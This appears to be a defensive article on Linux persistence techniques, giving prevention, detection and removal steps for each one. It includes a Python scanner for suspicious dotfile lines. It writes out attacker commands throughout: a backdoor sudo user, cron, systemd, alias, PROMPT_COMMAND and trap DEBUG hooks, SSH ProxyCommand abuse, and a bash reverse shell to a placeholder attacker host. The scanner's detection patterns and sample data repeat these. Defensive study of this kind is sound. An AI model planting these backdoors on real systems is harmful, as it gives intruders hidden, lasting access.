Persistence Mechanisms
Persistence is one of the most critical stages in a cyberattack: once an attacker has access, they want to make sure they can come back even if their initial entry point is closed. At Black Hat USA 2025, John Hammond presented several lesser-known Linux persistence techniques that defenders should be aware of.
In this article, I’ll review both common and lesser-known techniques, and, most importantly, how to prevent, detect, and remove them.
Common Persistence Techniques
1. Adding a Backdoor User
adduser attacker
usermod -aG sudo attacker
Prevention
Enforce centralized authentication (LDAP, AD, or PAM hardening).
Disable direct root login; use only known accounts with key-based auth.
Use tools like aide or osquery to monitor system files.
Detection
Check /etc/passwd and /etc/shadow for unexpected users. Audit /etc/group for sudo/wheel membership. Use lastlog to spot accounts that suddenly appear.
Removal
deluser attacker (or userdel -r attacker). Review /home/attacker for artifacts.
2. Adding SSH Keys
ssh-copy-id user@<VICTIM_IP>
Prevention
Restrict permissions: chmod 600 ~/.ssh/authorized_keys. Use centralized key management. Monitor with auditd for changes to .ssh directories.
Detection
Inspect ~/.ssh/authorized_keys for unknown keys. Audit /etc/ssh/sshd_config for unusual settings (AuthorizedKeysCommand). Look for hidden files like /opt/.hiddenkeys.
Removal
Remove the malicious key line from authorized_keys. Restart SSH if the system-wide config was modified.
3. Cron Jobs
echo "<frequency> backdoor_script" | crontab -
Prevention
Restrict cron usage to trusted users (/etc/cron.allow, /etc/cron.deny). Monitor changes with auditd.
Detection
Run crontab -l for each user. Inspect /etc/crontab and /etc/cron.*. Use systemctl list-timers.
Removal
Delete the malicious entry.
Kill any still-running process started by it.
4. Systemd Services
Malicious .service files:
[Service]
ExecStart=/usr/bin/<backdoor>
Prevention
Restrict sudo usage; don’t allow untrusted users to modify /etc/systemd/. Use tripwire/aide to monitor changes.
Detection
Run systemctl list-unit-files | grep enabled. Look for strange files in /etc/systemd/system/. Check logs: journalctl -u <service>.
Removal
systemctl disable <malicious>.service
systemctl stop <malicious>.service
rm /etc/systemd/system/<malicious>.service
5. RC Files (.bashrc, .profile, etc.)
Malicious lines in shell startup files:
bash -i >& /dev/tcp/<attacker>/4444 0>&1
Prevention
Apply least privilege: don’t allow attackers to write to home dirs.
Use restricted shells where possible.
Detection
Inspect hidden dotfiles in /home/*. Look for suspicious commands (netcat, bash -i, curl | sh). Use integrity monitoring.
Removal
Remove injected lines.
Rebuild affected dotfiles if unsure.
Lesser-Known Persistence Techniques
6. Environment Variables
export PROMPT_COMMAND="<backdoor> &"
Prevention
Restrict write access to environment configs.
Regular audits of environment variables.
Detection
Run printenv and look for unusual variables. Audit /etc/environment and /etc/profile.d/.
Removal
unset PROMPT_COMMAND. Clean .bashrc, .profile, /etc/profile.d/.
7. Trap Debug Hijack
trap "<backdoor> &" DEBUG
Prevention
Lock down dotfiles.
Monitor for shell modifications.
Detection
Inspect ~/.bashrc for trap commands. Run trap -p to list active traps.
Removal
trap - DEBUG
Then clean startup files.
8. Aliases
alias ls="backdoor & ls --color=auto"
Prevention
Enforce minimal shell profiles.
Integrity monitoring.
Detection
Run alias to list defined aliases. Inspect ~/.bashrc, ~/.zshrc, /etc/bash.bashrc.
Removal
unalias ls
Remove alias definitions from dotfiles.
grep -r "alias" /
9. SSH Config Abuse
Host *
ProxyCommand <backdoor> %h %p
Prevention
Enforce strict permissions: chmod 600 configs. Monitor for hidden files in /opt/, /etc/ssh/.
Detection
Inspect ~/.ssh/config and /etc/ssh/ssh_config. Look for ProxyCommand or unexpected AuthorizedKeysCommand.
Removal
Clean suspicious config directives.
Restart SSH.
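One way to sweep shell startup files and SSH client configuration for the indicators covered in sections 5 through 9 (reverse shells and pipe-to-shell in dotfiles, PROMPT_COMMAND, trap DEBUG, backgrounded aliases, ProxyCommand). This is an added example, not code from the talk or the original post; the indicator patterns are heuristics and the sample file contents are constructed, so every hit still needs a human to confirm it.

```python
import re

# Heuristic patterns for the persistence indicators discussed above.
# Names and regexes are constructed for this example; tune them per estate.
INDICATORS = {
    "reverse_shell": re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/"),
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "netcat": re.compile(r"\b(nc|ncat|netcat)\b"),
    "prompt_command": re.compile(r"\bPROMPT_COMMAND\s*="),
    "trap_debug": re.compile(r"\btrap\s+.*\bDEBUG\b"),
    # a lone '&' inside an alias body (not '&&', not '2>&1') means a
    # backgrounded command is hidden behind a normal-looking alias
    "backgrounded_alias": re.compile(r"\balias\s+\S+=.*(?<![&>])&(?![&\d>])"),
    "ssh_command_directive": re.compile(r"^\s*(ProxyCommand|AuthorizedKeysCommand)\b"),
}


def scan_file(path, text):
    """Return (path, indicator, line_no, line) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments cannot execute
        for name, rx in INDICATORS.items():
            if rx.search(line):
                findings.append((path, name, lineno, stripped))
    return findings


def scan_files(files):
    """Scan a mapping of path -> file content and concatenate the findings."""
    return [f for path, text in files.items() for f in scan_file(path, text)]


# Constructed sample contents mirroring the techniques in sections 5-9.
SAMPLE_FILES = {
    "/home/alice/.bashrc": (
        "# ~/.bashrc (constructed sample)\n"
        "alias ll='ls -la'\n"
        "export PATH=$HOME/bin:$PATH\n"
        "alias ls=\"backdoor & ls --color=auto\"\n"
        "export PROMPT_COMMAND=\"backdoor &\"\n"
        "trap \"backdoor &\" DEBUG\n"
        "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1\n"
    ),
    "/home/alice/.ssh/config": "Host *\n    ProxyCommand backdoor %h %p\n",
    "/etc/profile.d/clean.sh": "export EDITOR=vim\n",
}

if __name__ == "__main__":
    for path, name, lineno, line in scan_files(SAMPLE_FILES):
        print(f"{path}:{lineno}: [{name}] {line}")
```

On a real host, replace SAMPLE_FILES with the contents of the dotfiles under /home/* and /root, /etc/profile.d/, /etc/bash.bashrc and the SSH client configs listed above.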
10. PAM Degradation
Attackers may patch or replace PAM modules for stealth persistence.
Prevention
Only install signed packages.
Enable kernel module integrity checks (IMA/EVM).
Monitor with osquery.
Detection
Verify PAM configs: /etc/pam.d/*. Check integrity of libraries in /lib/security/. Use ldd to detect replaced shared objects.
Removal
Restore PAM configs from backup.
Reinstall libpam packages.
Conclusion
Persistence mechanisms range from blatant (extra users, cron jobs) to subtle (aliases, PAM tampering). The key for defenders is:
Prevent: enforce least privilege, configuration management and root access protection.
Detect: monitor system integrity (osquery, aide, auditd).
Remove: restore from clean backups, audit thoroughly.
Awareness is the first step because persistence is only effective if it goes unnoticed.